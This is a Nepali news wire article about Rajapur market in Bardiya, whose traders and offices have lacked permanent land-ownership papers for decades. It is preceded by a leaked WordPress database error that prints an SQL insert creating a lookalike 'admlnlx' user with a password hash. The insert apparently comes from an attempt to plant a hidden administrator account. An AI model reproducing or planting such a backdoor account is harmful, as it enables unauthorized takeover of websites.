WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIZLayXJGhL0bGSM9.ksViHbWmnTRv0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 21:07:19', '', 'admlnlx', 'admlnlx')
गुलरिया (बर्दिया), माघ १९ –
बर्दियाको प्रमुख व्यापारीक केन्द्र राजापुरको सिङ्गो बजार वर्षौंदेखि लालपुर्जाविहीन छ । उक्त बजारमा दर्जनभन्दा बढी सरकारी कार्यालय, बैंक, क्याम्पस, मठ–मन्दिर मदरसालगायत व्यक्तिगत संरचना निर्माण भए पनि कसैसँग पनि सो जग्गाको स्थायी भू–स्वामित्व छैन ।
राजापुर नगरपालिकासहित–५ गाविसलगायत कैलालीका सीमावर्ती गाविसको प्रवेशद्वार समेत रहेको ऐतिहासिक बजार राजापुरमा सरकारी, गैरसरकारी निकायका साथै स्थानीयवासीका ठूलाठूला पक्की महलसमेत बनिसके पनि घरधनीसँग न जग्गाधनी पुर्जा वा कुनै स्थायी प्रमाणपत्र पनि छैन । उनीहरुसँग केवल नगरपालिकालाई शुल्क तिरेको रसिदमात्र छ ।
जग्गाधनी पुर्जाका लागि २०६९ सालमा भूमिसुधार तथा व्यवस्था मन्त्रालयमार्फत नापी कार्यालय बर्दियाले कित्ताकाटसमेत गरी दर्ता प्रक्रिया अघि बढाएको थियो । ३५ दिने हकदाबीसम्बन्धी सूचना प्रकाशित भइसकेको अवस्थामा दर्ता प्रक्रियामा भूमाफियाले अनियमितता गर्दै रकम असुलेको भन्दै बेनामी उजुरी परेपछि अख्तियार दुरुपयोग अनुसन्धान आयोगले अनुसन्धानका लागि सो कार्य रोकेको हो ।
अख्तियारले छानबिन गरी समयमै निर्णय नगर्दा हालसम्म प्रक्रियाअघि बढ्न नसकेको बर्दिया उद्योग वाणिज्य सङ्घ राजापुरले जनाएको छ ।
अख्तियार दुरुपयोग अनुसन्धान आयोग शाखा कार्यालय कोहलपुरका सूचना अधिकारी चुरामणि पराजुलीले सो उजुरी बारे हाल आयोगको अभिलेखमा नरहेकाले अदालतमा विचाराधीन हुनसक्ने बताए ।
विसं २०११ सालदेखि कर्णाली नदीको किनारमा रहेको बजार २०१८ सालमा तत्कालीन बडा हाकिमको निर्देशनमा हालको बजार क्षेत्रमा अस्थायी पुर्जा दिएपछि बस्ती विस्तार भएको हो ।
विसं २०२१ सालमा भएको नापी टोलीमा स–साना कित्ता भएर नाप नक्सा हुन नसकिएको सो बजार हालसम्म पनि स्थायी दर्ता हुन नसकेको स्थानीयवासीको भनाइ छ । बस्ती बसेको वर्षौ बितिसक्दा समेत स्थायी लालपुर्जा नपाउँदा राजापुरवासीलाई विभिन्न समस्या हुने गरेको छ ।
दैनिक करोडाँैको काराबार हुने बजारमा पुर्जा नहुँदा सबैभन्दा बढी मार बैंकबाट ऋण लिँदा परेको सङ्घका उपाध्यक्ष चन्द्रश्वर सुवेदीले बताउनुभयो करोडाँैको घर जग्गा भए पनि पुर्जा नहँुदा यहाँका व्यवसायीलाई समस्या भएको छ । उहाँले भन्नुभयो ‘बैंकले प्रमाण पुर्जा खोज्छ, हामीसँग स्थायी प्रमाणको कुनै आधार छैन ।’ करोड मूल्यपर्ने घर भए पनि बैंकमा धितो राखेर ऋण निकालेरै व्यवसाय गरौँ भने स्थायी पुर्जा अभावमा समस्या हुने गरेको उहाँको भनाइ छ ।
दुई दशकअघिसम्म राजापुर बजार मध्य तथा सुदूरपश्चिमका पहाडी जिल्लाको प्रमुख व्यापारिक केन्द्र थियो । नेपालगन्ज, धनगढी, टिकापुरलगायत सम्बन्धित जिल्लामै मोटरबाटोका साथै बजारको विकास हुँदै जाँदा क्रमशः राजापुरमा हाट आउने पनि घटेका छन् ।
राजापुर भन्दापछि विस्तारित बजारले ठूलो फड्को मारिसक्दा पनि राजापुर जस्ताको त्यस्तै छ । बजारभित्रका भौतिक संरचना र सरसफाइ तथा ढल व्यवस्थापनको अवस्थासमेत सुध्रिन सकेको छैन । राजापुरको विकास नहुनुको पछाडि जग्गाधनी पुर्जा नहुनु एक प्रमुख कारण भएको स्थानीयवासी विष्णुप्रसाद उपाध्यायले बताउनुभयो । ‘पुर्जा नभएकै कारण ठूलो लगानी गरी पूर्वाधार निर्माण गर्न कठिनाई भएको छ’, उहाँले भन्नुभयोे ।
स्थायी पुर्जा नहँदा तीन वर्ष अघि नगरपालिका भएको राजापुर नगरपालिकालाई समेत विकास निर्माणका काम गर्न अफ्ठ्यारो भइरहेको नगरपालिकाले जनाएको छ ।
‘बाटो, नाला, कुन जग्गा कस्तो हो सरकारले प्रमाणित गरेर दिएको भए सहज हुने थियो’, कार्यकारी अधिकृत चेतनकुमार खत्रीले भने ‘हाल पुरानो नक्साअनुसार द्वीविधामा काम गर्नुपर्दा समस्या हुने गरेको छ ।’ ऐतिहासिक बजार राजापुरको विकासका लागि कानुनी जटिलतालाई छिट्टै टुङ््याई स्थायी दर्ता प्रक्रियामा जानुपर्ने स्थानीयवासीको माग रहेको छ । – रासस